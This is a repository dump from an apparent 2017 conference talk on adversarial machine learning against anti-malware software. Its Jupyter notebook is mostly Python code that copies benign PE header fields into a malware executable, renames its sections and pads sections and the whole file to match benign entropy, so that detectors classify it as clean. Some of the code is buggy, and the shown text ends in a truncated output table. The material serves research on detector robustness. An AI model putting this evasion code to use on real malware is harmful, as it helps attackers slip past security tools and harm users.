├── Adversarial Machine Learning for AV software.pdf ├── README.md ├── adversarial_model_for_av.ipynb └── extract.py /Adversarial Machine Learning for AV software.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nababora/advML/2cbc3351a2b1579a1465655df52c41369182bd50/Adversarial Machine Learning for AV software.pdf -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Adversarial Machine Learning for Anti-Malware Software 2 | 3 | presented in Secuinside 2017 @nababora 4 | 5 | Introduce practical guidances for developing adversarial machine model for anti-malware software. 6 | I didn't use reinforcement model yet, just proof-of-concept. 7 | 8 | 9 | -------------------------------------------------------------------------------- /adversarial_model_for_av.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "code", 5 | "execution_count": 13, 6 | "metadata": { 7 | "collapsed": true 8 | }, 9 | "outputs": [], 10 | "source": [ 11 | "import csv, os, pefile\n", 12 | "import math\n", 13 | "import array\n", 14 | "import random\n", 15 | "import pandas as pd\n", 16 | "\n", 17 | "import extract\n", 18 | "\n", 19 | "class Make_good():\n", 20 | "\n", 21 | " def __init__(self,benign,malware):\n", 22 | "\n", 23 | " header = ['e_cblp','e_cp','e_cparhdr','e_maxalloc','e_sp','e_lfanew',\\\n", 24 | " 'NumofSections','CreationYear','FH3_local_sym','FH4_ws_trim','FH11_file_system','FH13_up_system',\\\n", 25 | " 'Majorlinker','Minorlinker','SizeCode','InitialSize','UninitialSize','EntryPoint','BaseCode','BaseData',\\\n", 26 | " 'MajorOS','MinorOS','MajorImage','MinorImage','MajorSub','MinorSub','Checksum','Subsystem',\\\n", 27 | " 'SReserve','SCommit','HReserve','HCommit','LoaderFlags','DLL3','DLL4','DLL6'] #,'sus_sec','e_file','non_sus_sec','packer','e_text','e_data','filesize']\n", 28 | "\n", 29 | " self.benign_path = benign\n", 30 | " self.malware_path = malware \n", 31 | " self.total_list = pd.DataFrame(columns=header)\n", 32 | "\n", 33 | " def print_data(self, pe, clas):\n", 34 | "\n", 35 | " if clas == 1:\n", 36 | " msg = \"Malware\"\n", 37 | " else:\n", 38 | " msg = \"Benign\"\n", 39 | "\n", 40 | " dat = self.get_dos_data(pe) + self.get_file_data(pe) + self.get_optional_data(pe)\n", 41 | " self.total_list.loc[len(self.total_list)] = dat\n", 42 | "\n", 43 | " \n", 44 | " def get_dos_data(self, pe):\n", 45 | "\n", 46 | " dos_data = [pe.DOS_HEADER.e_cblp, pe.DOS_HEADER.e_cp, pe.DOS_HEADER.e_cparhdr, pe.DOS_HEADER.e_maxalloc, pe.DOS_HEADER.e_sp, pe.DOS_HEADER.e_lfanew]\n", 47 | " self.total_list.append(dos_data)\n", 48 | " \n", 49 | " return dos_data\n", 50 | "\n", 51 | " def get_file_data(self, pe):\n", 52 | "\n", 53 | " seconds= pe.FILE_HEADER.TimeDateStamp\n", 54 | " creation_year = 1970 + ((int(seconds) / 86400) / 365)\n", 55 | " \n", 56 | " tmp = [pe.FILE_HEADER.IMAGE_FILE_RELOCS_STRIPPED,\\\n", 57 | " pe.FILE_HEADER.IMAGE_FILE_EXECUTABLE_IMAGE,\\\n", 58 | " pe.FILE_HEADER.IMAGE_FILE_LINE_NUMS_STRIPPED,\\\n", 59 | " pe.FILE_HEADER.IMAGE_FILE_LOCAL_SYMS_STRIPPED,\\\n", 60 | " pe.FILE_HEADER.IMAGE_FILE_AGGRESIVE_WS_TRIM,\\\n", 61 | " pe.FILE_HEADER.IMAGE_FILE_LARGE_ADDRESS_AWARE,\\\n", 62 | " pe.FILE_HEADER.IMAGE_FILE_BYTES_REVERSED_LO,\\\n", 63 | " pe.FILE_HEADER.IMAGE_FILE_32BIT_MACHINE,\\\n", 64 | " pe.FILE_HEADER.IMAGE_FILE_DEBUG_STRIPPED,\\\n", 65 | " pe.FILE_HEADER.IMAGE_FILE_REMOVABLE_RUN_FROM_SWAP,\\\n", 66 | " pe.FILE_HEADER.IMAGE_FILE_NET_RUN_FROM_SWAP,\\\n", 67 | " pe.FILE_HEADER.IMAGE_FILE_SYSTEM,\\\n", 68 | " pe.FILE_HEADER.IMAGE_FILE_DLL,\\\n", 69 | " pe.FILE_HEADER.IMAGE_FILE_UP_SYSTEM_ONLY,\\\n", 70 | " pe.FILE_HEADER.IMAGE_FILE_BYTES_REVERSED_HI\n", 71 | " ]\n", 72 | " \n", 73 | " \n", 74 | " file_data = [pe.FILE_HEADER.NumberOfSections, creation_year, int(tmp[3]), int(tmp[4]), int(tmp[11]), int(tmp[13])]\n", 75 | " \n", 76 | " return file_data\n", 77 | "\n", 78 | " def get_optional_data(self, pe):\n", 79 | "\n", 80 | " tmp = [\n", 81 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE,\\\n", 82 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY,\\\n", 83 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NX_COMPAT ,\\\n", 84 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_ISOLATION,\\\n", 85 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_SEH,\\\n", 86 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_BIND,\\\n", 87 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_WDM_DRIVER,\\\n", 88 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE,\\\n", 89 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA,\\\n", 90 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_APPCONTAINER,\\\n", 91 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_GUARD_CF\n", 92 | " ]\n", 93 | " \n", 94 | " try:\n", 95 | " optional_data = [\n", 96 | " pe.OPTIONAL_HEADER.MajorLinkerVersion,\\\n", 97 | " pe.OPTIONAL_HEADER.MinorLinkerVersion,\\\n", 98 | " pe.OPTIONAL_HEADER.SizeOfCode,\\\n", 99 | " pe.OPTIONAL_HEADER.SizeOfInitializedData,\\\n", 100 | " pe.OPTIONAL_HEADER.SizeOfUninitializedData,\\\n", 101 | " pe.OPTIONAL_HEADER.AddressOfEntryPoint,\\\n", 102 | " pe.OPTIONAL_HEADER.BaseOfCode,\\\n", 103 | " pe.OPTIONAL_HEADER.BaseOfData,\\\n", 104 | " pe.OPTIONAL_HEADER.MajorOperatingSystemVersion,\\\n", 105 | " pe.OPTIONAL_HEADER.MinorOperatingSystemVersion,\\\n", 106 | " pe.OPTIONAL_HEADER.MajorImageVersion,\\\n", 107 | " pe.OPTIONAL_HEADER.MinorImageVersion,\\\n", 108 | " pe.OPTIONAL_HEADER.MajorSubsystemVersion,\\\n", 109 | " pe.OPTIONAL_HEADER.MinorSubsystemVersion,\\\n", 110 | " pe.OPTIONAL_HEADER.CheckSum,\\\n", 111 | " pe.OPTIONAL_HEADER.Subsystem,\n", 112 | " pe.OPTIONAL_HEADER.SizeOfStackReserve,\\\n", 113 | " pe.OPTIONAL_HEADER.SizeOfStackCommit,\\\n", 114 | " pe.OPTIONAL_HEADER.SizeOfHeapReserve,\\\n", 115 | " pe.OPTIONAL_HEADER.SizeOfHeapCommit,\\\n", 116 | " int(pe.OPTIONAL_HEADER.LoaderFlags == 0),\\\n", 117 | " int(tmp[3]), int(tmp[4]), int(tmp[6])]\n", 118 | "\n", 119 | " except Exception, e:\n", 120 | " print e \n", 121 | " \n", 122 | " return optional_data \n", 123 | "\n", 124 | " \n", 125 | " def write_dos_header(self, pe_b, pe_m):\n", 126 | " # total : 4\n", 127 | " pe_m.DOS_HEADER.e_cblp = pe_b.DOS_HEADER.e_cblp\n", 128 | " pe_m.DOS_HEADER.e_cparhdr = pe_b.DOS_HEADER.e_cparhdr\n", 129 | " pe_m.DOS_HEADER.e_maxalloc = pe_b.DOS_HEADER.e_maxalloc\n", 130 | " pe_m.DOS_HEADER.e_sp = pe_b.DOS_HEADER.e_sp\n", 131 | " \n", 132 | " def write_file_header(self, pe_b, pe_m): \n", 133 | " # total : 5\n", 134 | " pe_m.FILE_HEADER.TimeDateStamp = pe_b.FILE_HEADER.TimeDateStamp\n", 135 | " pe_m.FILE_HEADER.IMAGE_FILE_LOCAL_SYMS_STRIPPED = pe_b.FILE_HEADER.IMAGE_FILE_LOCAL_SYMS_STRIPPED\n", 136 | " pe_m.FILE_HEADER.IMAGE_FILE_AGGRESIVE_WS_TRIM = pe_b.FILE_HEADER.IMAGE_FILE_AGGRESIVE_WS_TRIM\n", 137 | " pe_m.FILE_HEADER.IMAGE_FILE_SYSTEM = pe_b.FILE_HEADER.IMAGE_FILE_SYSTEM \n", 138 | " pe_m.FILE_HEADER.IMAGE_FILE_UP_SYSTEM_ONLY = pe_b.FILE_HEADER.IMAGE_FILE_UP_SYSTEM_ONLY \n", 139 | " \n", 140 | "\n", 141 | " def write_optional_header(self, pe_b, pe_m):\n", 142 | " # total : 24\n", 143 | " pe_m.OPTIONAL_HEADER.MajorLinkerVersion = pe_b.OPTIONAL_HEADER.MajorLinkerVersion \n", 144 | " pe_m.OPTIONAL_HEADER.MinorLinkerVersion = pe_b.OPTIONAL_HEADER.MinorLinkerVersion\n", 145 | " pe_m.OPTIONAL_HEADER.SizeOfCode = pe_b.OPTIONAL_HEADER.SizeOfCode \n", 146 | " pe_m.OPTIONAL_HEADER.SizeOfInitializedData = pe_b.OPTIONAL_HEADER.SizeOfInitializedData\n", 147 | " pe_m.OPTIONAL_HEADER.SizeOfUninitializedData = pe_b.OPTIONAL_HEADER.SizeOfUninitializedData \n", 148 | " pe_m.OPTIONAL_HEADER.BaseOfCode = pe_b.OPTIONAL_HEADER.BaseOfCode \n", 149 | " pe_m.OPTIONAL_HEADER.BaseOfData = pe_b.OPTIONAL_HEADER.BaseOfData\n", 150 | " pe_m.OPTIONAL_HEADER.MajorOperatingSystemVersion = pe_b.OPTIONAL_HEADER.MajorOperatingSystemVersion\n", 151 | " pe_m.OPTIONAL_HEADER.MinorOperatingSystemVersion = pe_b.OPTIONAL_HEADER.MinorOperatingSystemVersion\n", 152 | " pe_m.OPTIONAL_HEADER.MajorImageVersion = pe_b.OPTIONAL_HEADER.MajorImageVersion\n", 153 | " pe_m.OPTIONAL_HEADER.MinorImageVersion = pe_b.OPTIONAL_HEADER.MinorImageVersion\n", 154 | " pe_m.OPTIONAL_HEADER.MajorSubsystemVersion = pe_b.OPTIONAL_HEADER.MajorSubsystemVersion\n", 155 | " pe_m.OPTIONAL_HEADER.MinorSubsystemVersion = pe_b.OPTIONAL_HEADER.MinorSubsystemVersion\n", 156 | " pe_m.OPTIONAL_HEADER.CheckSum = pe_b.OPTIONAL_HEADER.CheckSum\n", 157 | " pe_m.OPTIONAL_HEADER.Subsystem = pe_b.OPTIONAL_HEADER.Subsystem\n", 158 | " pe_m.OPTIONAL_HEADER.SizeOfStackReserve = pe_b.OPTIONAL_HEADER.SizeOfStackReserve\n", 159 | " pe_m.OPTIONAL_HEADER.SizeOfStackCommit = pe_b.OPTIONAL_HEADER.SizeOfStackCommit\n", 160 | " pe_m.OPTIONAL_HEADER.SizeOfHeapReserve = pe_b.OPTIONAL_HEADER.SizeOfHeapReserve\n", 161 | " pe_m.OPTIONAL_HEADER.SizeOfHeapCommit = pe_b.OPTIONAL_HEADER.SizeOfHeapCommit\n", 162 | " pe_m.OPTIONAL_HEADER.LoaderFlags = pe_b.OPTIONAL_HEADER.LoaderFlags\n", 163 | " pe_m.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_ISOLATION = pe_b.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_ISOLATION\n", 164 | " pe_m.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_SEH = pe_b.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_SEH\n", 165 | " pe_m.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_BIND = pe_b.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_BIND\n", 166 | " pe_m.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_WDM_DRIVER = pe_b.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_WDM_DRIVER\n", 167 | " \n", 168 | " \n", 169 | " def write_extra_info(self, pe_b, pe_m):\n", 170 | " # total : 2\n", 171 | " benign_sections = ['.text', '.rdata','.data','.idata','.edata','.rsrc','.bss','.crt','.tls']\n", 172 | " \n", 173 | " NumSection = pe_m.FILE_HEADER.NumberOfSections\n", 174 | " for i in range(0, NumSection):\n", 175 | " pe_m.sections[i].Name = benign_sections[i].encode()\n", 176 | " \n", 177 | " \n", 178 | " def get_start(self, mode):\n", 179 | "\n", 180 | " # get benign pe file with pefile \n", 181 | " try:\n", 182 | " pe_benign = pefile.PE(self.benign_path)\n", 183 | " except Exception, e:\n", 184 | " print \"{} while opening {}\".format(e,self.benign_path)\n", 185 | "\n", 186 | " # get malware pe file with pefile \n", 187 | " try:\n", 188 | " pe_malware = pefile.PE(self.malware_path)\n", 189 | " except Exception, e:\n", 190 | " print \"{} while opening {}\".format(e,self.malware_path)\n", 191 | "\n", 192 | " self.print_data(pe_benign, 0)\n", 193 | " self.print_data(pe_malware, 1)\n", 194 | " \n", 195 | " if mode == 1:\n", 196 | " self.write_dos_header(pe_benign, pe_malware)\n", 197 | " self.write_file_header(pe_benign, pe_malware)\n", 198 | " self.write_optional_header(pe_benign, pe_malware)\n", 199 | " self.write_extra_info(pe_benign, pe_malware)\n", 200 | "\n", 201 | " new_exe_path = \"malware_.exe\"\n", 202 | " pe_malware.write(new_exe_path)\n", 203 | " new_pe = pefile.PE(new_exe_path)\n", 204 | " \n", 205 | " return self.total_list\n", 206 | "\n", 207 | "\n", 208 | " " 209 | ] 210 | }, 211 | { 212 | "cell_type": "code", 213 | "execution_count": 2, 214 | "metadata": { 215 | "collapsed": true 216 | }, 217 | "outputs": [], 218 | "source": [ 219 | "def cal_byteFrequency(byteArr,fileSize):\n", 220 | " freqList = []\n", 221 | " for b in range(256):\n", 222 | " ctr = 0\n", 223 | " for byte in byteArr:\n", 224 | " if byte == b:\n", 225 | " ctr += 1\n", 226 | " freqList.append(float(ctr) / fileSize)\n", 227 | " return freqList\n", 228 | "\n", 229 | "def get_file_entropy(byteArr, fileSize):\n", 230 | " freqList = cal_byteFrequency(byteArr,fileSize)\n", 231 | " # Shannon entropy\n", 232 | " ent = 0.0\n", 233 | " for freq in freqList:\n", 234 | " if freq > 0:\n", 235 | " ent += - freq * math.log(freq, 2)\n", 236 | " return [fileSize,ent]\n", 237 | "\n", 238 | "def get_text_data_entropy(pe):\n", 239 | " result=[0.0, 0.0]\n", 240 | " \n", 241 | " for section in pe.sections:\n", 242 | " s_name = section.Name.split('\\x00')[0]\n", 243 | " if s_name == \".text\":\n", 244 | " result[0]= section.get_entropy()\n", 245 | " elif s_name == \".data\":\n", 246 | " result[1]= section.get_entropy()\n", 247 | " else:\n", 248 | " pass\n", 249 | " return result \n", 250 | "\n", 251 | "def get_file_bytes_size(filepath):\n", 252 | " f = open(filepath, \"rb\")\n", 253 | " byteArr = map(ord, f.read())\n", 254 | " f.close()\n", 255 | " fileSize = len(byteArr)\n", 256 | " return byteArr,fileSize\n" 257 | ] 258 | }, 259 | { 260 | "cell_type": "code", 261 | "execution_count": 3, 262 | "metadata": { 263 | "collapsed": true 264 | }, 265 | "outputs": [], 266 | "source": [ 267 | "def write_text_entropy(ben, mal, loo):\n", 268 | " \n", 269 | " ben_pe = pefile.PE(ben)\n", 270 | " mal_pe = pefile.PE(mal)\n", 271 | " \n", 272 | " ben_en = get_text_data_entropy(ben_pe)\n", 273 | " mal_en = get_text_data_entropy(mal_pe)\n", 274 | " \n", 275 | " #print \"[ entropy before ]\", \"\\n ben: \", ben_en[0], \" mal: \", mal_en[0]\n", 276 | " #print \"align: \", hex(mal_pe.OPTIONAL_HEADER.SectionAlignment), \" \", hex(mal_pe.OPTIONAL_HEADER.FileAlignment)\n", 277 | " \n", 278 | " insert_mul = loo\n", 279 | " text_padding = mal_pe.OPTIONAL_HEADER.FileAlignment*insert_mul\n", 280 | "\n", 281 | " for section in mal_pe.sections:\n", 282 | "\n", 283 | " s_name = section.Name.split('\\x00')[0]\n", 284 | " if s_name == \".text\":\n", 285 | " start = section.PointerToRawData + section.SizeOfRawData\n", 286 | " section.SizeOfRawData += text_padding\n", 287 | " end = section.PointerToRawData + section.SizeOfRawData\n", 288 | " else:\n", 289 | " section.PointerToRawData += text_padding\n", 290 | "\n", 291 | " #print section.Name, hex(section.VirtualAddress), hex(section.Misc_VirtualSize), hex(section.PointerToRawData), hex(section.SizeOfRawData)\n", 292 | "\n", 293 | " mal_pe.write(after_t)\n", 294 | " mal_pe.__data__.close()\n", 295 | " bytearr, _ = get_file_bytes_size(after_t)\n", 296 | " \n", 297 | " if ben_en[0] > mal_en[0]:\n", 298 | " bytearr[start:text_padding] = [random.sample(range(255), 1)[0] for i in range(0, text_padding)]\n", 299 | " else:\n", 300 | " bytearr[start:text_padding] = [0 for i in range(0, text_padding)]\n", 301 | "\n", 302 | " #print l, ar\n", 303 | " #print len(bytearr), bytearr[start:end]\n", 304 | "\n", 305 | " byte = array.array('B', bytearr).tostring()\n", 306 | " f = open(after_t, 'wb')\n", 307 | " f.write(byte)\n", 308 | " f.close()\n", 309 | "\n", 310 | " new_pe = pefile.PE(after_t)\n", 311 | " new_en = get_text_data_entropy(new_pe)\n", 312 | " bytearr, _ = get_file_bytes_size(after_t)\n", 313 | " #print bytearr[start:end], len(bytearr[start:end])\n", 314 | "\n", 315 | " diff = abs(new_en[0] - ben_en[0])\n", 316 | " print \"* text section entropy :\", mal_en[0], \"->\", new_en[0], \" diff: \", diff\n", 317 | "\n", 318 | " return diff, new_en[0]\n" 319 | ] 320 | }, 321 | { 322 | "cell_type": "code", 323 | "execution_count": 4, 324 | "metadata": { 325 | "collapsed": true 326 | }, 327 | "outputs": [], 328 | "source": [ 329 | "def write_data_entropy(ben, mal, loo):\n", 330 | " \n", 331 | " ben_pe = pefile.PE(ben)\n", 332 | " mal_pe = pefile.PE(mal)\n", 333 | " \n", 334 | " ben_en = get_text_data_entropy(ben_pe)\n", 335 | " mal_en = get_text_data_entropy(mal_pe)\n", 336 | " \n", 337 | " #print \"[ entropy before ]\", \"\\n ben: \", ben_en[1], \" mal: \", mal_en[1]\n", 338 | " #print \"align: \", hex(mal_pe.OPTIONAL_HEADER.SectionAlignment), \" \", hex(mal_pe.OPTIONAL_HEADER.FileAlignment)\n", 339 | " \n", 340 | " insert_mul = loo\n", 341 | " text_padding = mal_pe.OPTIONAL_HEADER.FileAlignment*insert_mul\n", 342 | "\n", 343 | " for section in mal_pe.sections:\n", 344 | "\n", 345 | " s_name = section.Name.split('\\x00')[0]\n", 346 | " if s_name == \".data\":\n", 347 | " start = section.PointerToRawData + section.SizeOfRawData\n", 348 | " section.SizeOfRawData += text_padding\n", 349 | " end = section.PointerToRawData + section.SizeOfRawData\n", 350 | " elif s_name != \".text\" and s_name != \".data\":\n", 351 | " section.PointerToRawData += text_padding\n", 352 | "\n", 353 | " #print section.Name, hex(section.VirtualAddress), hex(section.Misc_VirtualSize), hex(section.PointerToRawData), hex(section.SizeOfRawData)\n", 354 | "\n", 355 | " mal_pe.write(after_d)\n", 356 | " mal_pe.__data__.close()\n", 357 | " bytearr, _ = get_file_bytes_size(after_d)\n", 358 | " if ben_en[1] > mal_en[1]:\n", 359 | " bytearr[start:text_padding] = [random.sample(range(255), 1)[0] for i in range(0, text_padding)]\n", 360 | " else:\n", 361 | " bytearr[start:text_padding] = [0 for i in range(0, text_padding)]\n", 362 | "\n", 363 | " #print l, ar\n", 364 | " #print len(bytearr), bytearr[start:end]\n", 365 | "\n", 366 | " byte = array.array('B', bytearr).tostring()\n", 367 | " f = open(after_d, 'wb')\n", 368 | " f.write(byte)\n", 369 | " f.close()\n", 370 | "\n", 371 | " new_pe = pefile.PE(after_d)\n", 372 | " new_en = get_text_data_entropy(new_pe)\n", 373 | " bytearr, _ = get_file_bytes_size(after_d)\n", 374 | " #print bytearr[start:end], len(bytearr[start:end])\n", 375 | "\n", 376 | " diff = abs(new_en[1] - ben_en[1])\n", 377 | " print \"* data section entropy :\", mal_en[1], \"->\", new_en[1], \" diff: \", diff\n", 378 | "\n", 379 | " return diff, new_en[1]\n", 380 | "\n" 381 | ] 382 | }, 383 | { 384 | "cell_type": "code", 385 | "execution_count": 5, 386 | "metadata": { 387 | "collapsed": true 388 | }, 389 | "outputs": [], 390 | "source": [ 391 | "def write_file_entropy(ben, mal):\n", 392 | " \n", 393 | " save = 0\n", 394 | " rns = 0\n", 395 | " \n", 396 | " ben_byte, ben_size = get_file_bytes_size(ben)\n", 397 | " mal_byte, mal_size = get_file_bytes_size(mal)\n", 398 | "\n", 399 | " _, ben_en = get_file_entropy(ben_byte, ben_size)\n", 400 | " _, mal_en = get_file_entropy(mal_byte, mal_size)\n", 401 | " \n", 402 | " \n", 403 | " diff_bak = 10.0\n", 404 | " \n", 405 | " print \"File entropy before: \", ben_en, \" \", mal_en, \" diff_bak: \", diff_bak \n", 406 | " \n", 407 | " \n", 408 | " for di in range(1, 100):\n", 409 | " \n", 410 | " if save:\n", 411 | " di = di -1\n", 412 | " \n", 413 | " bytearr = mal_byte\n", 414 | " append_size = 4096*di\n", 415 | " \n", 416 | " if ben_en < mal_en:\n", 417 | " appen = [0 for i in xrange(append_size)]\n", 418 | " bytearr.extend(appen)\n", 419 | " else:\n", 420 | " appen = [random.sample(range(255), 1)[0] for i in xrange(append_size)]\n", 421 | " bytearr.extend(appen)\n", 422 | "\n", 423 | " size, ent = get_file_entropy(bytearr, (mal_size + append_size))\n", 424 | " diff = abs(ben_en - ent)\n", 425 | " print \"entropy after :\", mal_en, \" -> \", ent, \" diff: \", diff\n", 426 | "\n", 427 | " if diff_bak < diff:\n", 428 | " save = 1\n", 429 | "\n", 430 | " else:\n", 431 | " diff_bak = diff\n", 432 | " \n", 433 | " if save:\n", 434 | " rns = ent\n", 435 | " byte = array.array('B', bytearr).tostring()\n", 436 | " f = open(final, 'wb')\n", 437 | " f.write(byte)\n", 438 | " f.close()\n", 439 | " break\n", 440 | " \n", 441 | " return rns\n" 442 | ] 443 | }, 444 | { 445 | "cell_type": "code", 446 | "execution_count": 14, 447 | "metadata": {}, 448 | "outputs": [ 449 | { 450 | "name": "stdout", 451 | "output_type": "stream", 452 | "text": [ 453 | "[*] Before Crafting Malware Sample \n" 454 | ] 455 | }, 456 | { 457 | "data": { 458 | "text/html": [ 459 | "
\n", 477 | " | e_cblp | \n", 478 | "e_cp | \n", 479 | "e_cparhdr | \n", 480 | "e_maxalloc | \n", 481 | "e_sp | \n", 482 | "e_lfanew | \n", 483 | "NumofSections | \n", 484 | "CreationYear | \n", 485 | "FH3_local_sym | \n", 486 | "FH4_ws_trim | \n", 487 | "... | \n", 488 | "Checksum | \n", 489 | "Subsystem | \n", 490 | "SReserve | \n", 491 | "SCommit | \n", 492 | "HReserve | \n", 493 | "HCommit | \n", 494 | "LoaderFlags | \n", 495 | "DLL3 | \n", 496 | "DLL4 | \n", 497 | "DLL6 | \n", 498 | "
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | \n", 503 | "144 | \n", 504 | "3 | \n", 505 | "4 | \n", 506 | "65535 | \n", 507 | "184 | \n", 508 | "280 | \n", 509 | "5 | \n", 510 | "2017 | \n", 511 | "0 | \n", 512 | "0 | \n", 513 | "... | \n", 514 | "2727685 | \n", 515 | "2 | \n", 516 | "1048576 | \n", 517 | "4096 | \n", 518 | "1048576 | \n", 519 | "4096 | \n", 520 | "1 | \n", 521 | "0 | \n", 522 | "0 | \n", 523 | "0 | \n", 524 | "
1 | \n", 527 | "80 | \n", 528 | "2 | \n", 529 | "4 | \n", 530 | "65535 | \n", 531 | "184 | \n", 532 | "256 | \n", 533 | "8 | \n", 534 | "1992 | \n", 535 | "1 | \n", 536 | "0 | \n", 537 | "... | \n", 538 | "684332 | \n", 539 | "2 | \n", 540 | "1048576 | \n", 541 | "16384 | \n", 542 | "1048576 | \n", 543 | "4096 | \n", 544 | "1 | \n", 545 | "0 | \n", 546 | "0 | \n", 547 | "0 | \n", 548 | "
2 rows × 36 columns
\n", 552 | "